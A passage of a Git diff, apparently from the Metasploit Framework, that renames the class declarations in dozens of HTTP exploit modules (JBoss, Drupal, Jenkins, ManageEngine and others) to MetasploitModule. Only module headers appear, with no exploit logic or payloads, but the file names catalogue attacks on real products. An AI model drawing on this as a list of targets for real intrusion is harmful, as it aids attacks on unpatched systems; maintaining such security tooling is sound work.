< Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)|Jetty.*/ ] } diff --git a/modules/exploits/multi/http/bolt_file_upload.rb b/modules/exploits/multi/http/bolt_file_upload.rb index 30b5987cb4..810c5a1234 100644 --- a/modules/exploits/multi/http/bolt_file_upload.rb +++ b/modules/exploits/multi/http/bolt_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb index b3b854cee9..41592806fa 100644 --- a/modules/exploits/multi/http/caidao_php_backdoor_exec.rb +++ b/modules/exploits/multi/http/caidao_php_backdoor_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cisco_dcnm_upload.rb b/modules/exploits/multi/http/cisco_dcnm_upload.rb index 348dea375a..78267b571c 100644 --- a/modules/exploits/multi/http/cisco_dcnm_upload.rb +++ b/modules/exploits/multi/http/cisco_dcnm_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/coldfusion_rds.rb b/modules/exploits/multi/http/coldfusion_rds.rb index 758cbcf46e..d080bbed55 100644 --- a/modules/exploits/multi/http/coldfusion_rds.rb +++ b/modules/exploits/multi/http/coldfusion_rds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/cups_bash_env_exec.rb b/modules/exploits/multi/http/cups_bash_env_exec.rb index 81897bc3e0..cf5ac18410 100644 --- a/modules/exploits/multi/http/cups_bash_env_exec.rb +++ b/modules/exploits/multi/http/cups_bash_env_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 865ca0fbd2..1775c6d41c 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index f999bafa7c..fd8d55a9c8 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/drupal_drupageddon.rb b/modules/exploits/multi/http/drupal_drupageddon.rb index ac0adec7c5..38f32cb614 100644 --- a/modules/exploits/multi/http/drupal_drupageddon.rb +++ b/modules/exploits/multi/http/drupal_drupageddon.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eaton_nsm_code_exec.rb b/modules/exploits/multi/http/eaton_nsm_code_exec.rb index b25107fc24..aa9ea2ce7f 100644 --- a/modules/exploits/multi/http/eaton_nsm_code_exec.rb +++ b/modules/exploits/multi/http/eaton_nsm_code_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/eventlog_file_upload.rb b/modules/exploits/multi/http/eventlog_file_upload.rb index eda04d55c3..442cb13d75 100644 --- a/modules/exploits/multi/http/eventlog_file_upload.rb +++ b/modules/exploits/multi/http/eventlog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/extplorer_upload_exec.rb b/modules/exploits/multi/http/extplorer_upload_exec.rb index 542509bd28..a9208b1b86 100644 --- a/modules/exploits/multi/http/extplorer_upload_exec.rb +++ b/modules/exploits/multi/http/extplorer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/familycms_less_exec.rb b/modules/exploits/multi/http/familycms_less_exec.rb index 07e3741261..47fa520192 100644 --- a/modules/exploits/multi/http/familycms_less_exec.rb +++ b/modules/exploits/multi/http/familycms_less_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/freenas_exec_raw.rb b/modules/exploits/multi/http/freenas_exec_raw.rb index da1dbb571e..0911ea8a47 100644 --- a/modules/exploits/multi/http/freenas_exec_raw.rb +++ b/modules/exploits/multi/http/freenas_exec_raw.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gestioip_exec.rb b/modules/exploits/multi/http/gestioip_exec.rb index 7b7162bb13..5f4c75ebb5 100644 --- a/modules/exploits/multi/http/gestioip_exec.rb +++ b/modules/exploits/multi/http/gestioip_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/git_client_command_exec.rb b/modules/exploits/multi/http/git_client_command_exec.rb index 566cfea515..3f4972cdc2 100644 --- a/modules/exploits/multi/http/git_client_command_exec.rb +++ b/modules/exploits/multi/http/git_client_command_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/http/gitlab_shell_exec.rb b/modules/exploits/multi/http/gitlab_shell_exec.rb index 5f1b1054dc..730692f081 100644 --- a/modules/exploits/multi/http/gitlab_shell_exec.rb +++ b/modules/exploits/multi/http/gitlab_shell_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/gitorious_graph.rb b/modules/exploits/multi/http/gitorious_graph.rb index 8258c0e9f1..aa70e5f6ce 100644 --- a/modules/exploits/multi/http/gitorious_graph.rb +++ b/modules/exploits/multi/http/gitorious_graph.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glassfish_deployer.rb b/modules/exploits/multi/http/glassfish_deployer.rb index 43782be301..dadd0efdc8 100644 --- a/modules/exploits/multi/http/glassfish_deployer.rb +++ b/modules/exploits/multi/http/glassfish_deployer.rb @@ -8,7 +8,7 @@ require 'nokogiri' require 'metasploit/framework/login_scanner/glassfish' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb index a829e464cc..1894ddd170 100644 --- a/modules/exploits/multi/http/glossword_upload_exec.rb +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/glpi_install_rce.rb b/modules/exploits/multi/http/glpi_install_rce.rb index 19cdc98388..1703db59af 100644 --- a/modules/exploits/multi/http/glpi_install_rce.rb +++ b/modules/exploits/multi/http/glpi_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # Application database configuration is overwritten include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 2490945fbb..49ef2be08b 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb index e27433b5a2..bc8becf8b6 100644 --- a/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb +++ b/modules/exploits/multi/http/hp_sitescope_issuesiebelcmd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index aa418720b9..275271580a 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb index 25f76c5668..5ff5bc1d27 100644 --- a/modules/exploits/multi/http/hp_sys_mgmt_exec.rb +++ b/modules/exploits/multi/http/hp_sys_mgmt_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/http/hyperic_hq_script_console.rb b/modules/exploits/multi/http/hyperic_hq_script_console.rb index 329b8ee316..bfcb22a5c5 100644 --- a/modules/exploits/multi/http/hyperic_hq_script_console.rb +++ b/modules/exploits/multi/http/hyperic_hq_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/ispconfig_php_exec.rb b/modules/exploits/multi/http/ispconfig_php_exec.rb index 361c2c90ad..d95978ff4a 100644 --- a/modules/exploits/multi/http/ispconfig_php_exec.rb +++ b/modules/exploits/multi/http/ispconfig_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 0fc393a14e..bfe151d892 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 5e8d269d03..e3ddeb488b 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_invoke_deploy.rb b/modules/exploits/multi/http/jboss_invoke_deploy.rb index 4b68cfdd07..c5380c9318 100644 --- a/modules/exploits/multi/http/jboss_invoke_deploy.rb +++ b/modules/exploits/multi/http/jboss_invoke_deploy.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /JBoss/ ] } diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 514a6a45b3..50f2944360 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] } diff --git a/modules/exploits/multi/http/jboss_seam_upload_exec.rb b/modules/exploits/multi/http/jboss_seam_upload_exec.rb index b8670c6052..779dd807da 100644 --- a/modules/exploits/multi/http/jboss_seam_upload_exec.rb +++ b/modules/exploits/multi/http/jboss_seam_upload_exec.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb index d825a6f68f..10ca92c3c8 100644 --- a/modules/exploits/multi/http/jenkins_script_console.rb +++ b/modules/exploits/multi/http/jenkins_script_console.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/jira_hipchat_template.rb b/modules/exploits/multi/http/jira_hipchat_template.rb index 924d348356..b1a4cc705a 100644 --- a/modules/exploits/multi/http/jira_hipchat_template.rb +++ b/modules/exploits/multi/http/jira_hipchat_template.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'json' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index d395288c87..99db3c5a68 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla diff --git a/modules/exploits/multi/http/kordil_edms_upload_exec.rb b/modules/exploits/multi/http/kordil_edms_upload_exec.rb index 3f550c6497..cbbf4c166a 100644 --- a/modules/exploits/multi/http/kordil_edms_upload_exec.rb +++ b/modules/exploits/multi/http/kordil_edms_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/lcms_php_exec.rb b/modules/exploits/multi/http/lcms_php_exec.rb index 0365b344fc..45aba792cc 100644 --- a/modules/exploits/multi/http/lcms_php_exec.rb +++ b/modules/exploits/multi/http/lcms_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb index 3e7f142d56..dac6cb7080 100644 --- a/modules/exploits/multi/http/log1cms_ajax_create_folder.rb +++ b/modules/exploits/multi/http/log1cms_ajax_create_folder.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb index 71b8f3c04e..930d4b482a 100644 --- a/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb +++ b/modules/exploits/multi/http/manage_engine_dc_pmp_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb index 7ea5105ad1..40cf9be0dd 100644 --- a/modules/exploits/multi/http/manageengine_auth_upload.rb +++ b/modules/exploits/multi/http/manageengine_auth_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_sd_uploader.rb b/modules/exploits/multi/http/manageengine_sd_uploader.rb index 5b8c04f0ce..f975cd624b 100644 --- a/modules/exploits/multi/http/manageengine_sd_uploader.rb +++ b/modules/exploits/multi/http/manageengine_sd_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/manageengine_search_sqli.rb b/modules/exploits/multi/http/manageengine_search_sqli.rb index a16088a0d2..cfc0508c60 100644 --- a/modules/exploits/multi/http/manageengine_search_sqli.rb +++ b/modules/exploits/multi/http/manageengine_search_sqli.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/file_dropper' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mantisbt_php_exec.rb b/modules/exploits/multi/http/mantisbt_php_exec.rb index 48523cc5ef..29c7e6c2f5 100644 --- a/modules/exploits/multi/http/mantisbt_php_exec.rb +++ b/modules/exploits/multi/http/mantisbt_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mediawiki_thumb.rb b/modules/exploits/multi/http/mediawiki_thumb.rb index be3bcfea1d..c42d61c2cf 100644 --- a/modules/exploits/multi/http/mediawiki_thumb.rb +++ b/modules/exploits/multi/http/mediawiki_thumb.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mma_backdoor_upload.rb b/modules/exploits/multi/http/mma_backdoor_upload.rb index 55a33c3fe7..e79e6b15eb 100644 --- a/modules/exploits/multi/http/mma_backdoor_upload.rb +++ b/modules/exploits/multi/http/mma_backdoor_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mobilecartly_upload_exec.rb b/modules/exploits/multi/http/mobilecartly_upload_exec.rb index d58161de13..5b37159161 100644 --- a/modules/exploits/multi/http/mobilecartly_upload_exec.rb +++ b/modules/exploits/multi/http/mobilecartly_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/moodle_cmd_exec.rb b/modules/exploits/multi/http/moodle_cmd_exec.rb index fa019366ef..8b1ac0a3f4 100644 --- a/modules/exploits/multi/http/moodle_cmd_exec.rb +++ b/modules/exploits/multi/http/moodle_cmd_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/movabletype_upgrade_exec.rb b/modules/exploits/multi/http/movabletype_upgrade_exec.rb index 5053599cb9..ec129c1f43 100644 --- a/modules/exploits/multi/http/movabletype_upgrade_exec.rb +++ b/modules/exploits/multi/http/movabletype_upgrade_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb index 485fc65d39..8dee91cb69 100644 --- a/modules/exploits/multi/http/mutiny_subnetmask_exec.rb +++ b/modules/exploits/multi/http/mutiny_subnetmask_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nas4free_php_exec.rb b/modules/exploits/multi/http/nas4free_php_exec.rb index 2de2f53e56..95e308519c 100644 --- a/modules/exploits/multi/http/nas4free_php_exec.rb +++ b/modules/exploits/multi/http/nas4free_php_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit4 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/netwin_surgeftp_exec.rb b/modules/exploits/multi/http/netwin_surgeftp_exec.rb index 5d52ed78f7..117e37cc8b 100644 --- a/modules/exploits/multi/http/netwin_surgeftp_exec.rb +++ b/modules/exploits/multi/http/netwin_surgeftp_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/nibbleblog_file_upload.rb b/modules/exploits/multi/http/nibbleblog_file_upload.rb index a0c53a5fe2..3173aaa9f6 100644 --- a/modules/exploits/multi/http/nibbleblog_file_upload.rb +++ b/modules/exploits/multi/http/nibbleblog_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_license.rb b/modules/exploits/multi/http/op5_license.rb index 885c5052db..646a6d6b59 100644 --- a/modules/exploits/multi/http/op5_license.rb +++ b/modules/exploits/multi/http/op5_license.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/op5_welcome.rb b/modules/exploits/multi/http/op5_welcome.rb index d46dd09a10..d8a570bf4c 100644 --- a/modules/exploits/multi/http/op5_welcome.rb +++ b/modules/exploits/multi/http/op5_welcome.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/openfire_auth_bypass.rb b/modules/exploits/multi/http/openfire_auth_bypass.rb index d18396ba80..e12572648c 100644 --- a/modules/exploits/multi/http/openfire_auth_bypass.rb +++ b/modules/exploits/multi/http/openfire_auth_bypass.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /(Jetty)/ ] } diff --git a/modules/exploits/multi/http/openmediavault_cmd_exec.rb b/modules/exploits/multi/http/openmediavault_cmd_exec.rb index 4be4d81ca7..d4a5f60cac 100644 --- a/modules/exploits/multi/http/openmediavault_cmd_exec.rb +++ b/modules/exploits/multi/http/openmediavault_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/http/openx_backdoor_php.rb b/modules/exploits/multi/http/openx_backdoor_php.rb index 1a097fd6bb..0fd826a77b 100644 --- a/modules/exploits/multi/http/openx_backdoor_php.rb +++ b/modules/exploits/multi/http/openx_backdoor_php.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb index d9017acff1..2b1876fd2f 100644 --- a/modules/exploits/multi/http/opmanager_socialit_file_upload.rb +++ b/modules/exploits/multi/http/opmanager_socialit_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/oracle_reports_rce.rb b/modules/exploits/multi/http/oracle_reports_rce.rb index aa96081ab7..4b8bf6c40b 100644 --- a/modules/exploits/multi/http/oracle_reports_rce.rb +++ b/modules/exploits/multi/http/oracle_reports_rce.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'uri' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/http/pandora_upload_exec.rb b/modules/exploits/multi/http/pandora_upload_exec.rb index e260323353..21e9ab5a64 100644 --- a/modules/exploits/multi/http/pandora_upload_exec.rb +++ b/modules/exploits/multi/http/pandora_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb index 5ff2a02952..a5d142906b 100644 --- a/modules/exploits/multi/http/php_cgi_arg_injection.rb +++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/php_volunteer_upload_exec.rb b/modules/exploits/multi/http/php_volunteer_upload_exec.rb index 56dcda56d7..096812613d 100644 --- a/modules/exploits/multi/http/php_volunteer_upload_exec.rb +++ b/modules/exploits/multi/http/php_volunteer_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/phpfilemanager_rce.rb b/modules/exploits/multi/http/phpfilemanager_rce.rb index ee92c2d006..2bf5e4a4ac 100644 --- a/modules/exploits/multi/http/phpfilemanager_rce.rb +++ b/modules/exploits/multi/http/phpfilemanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < 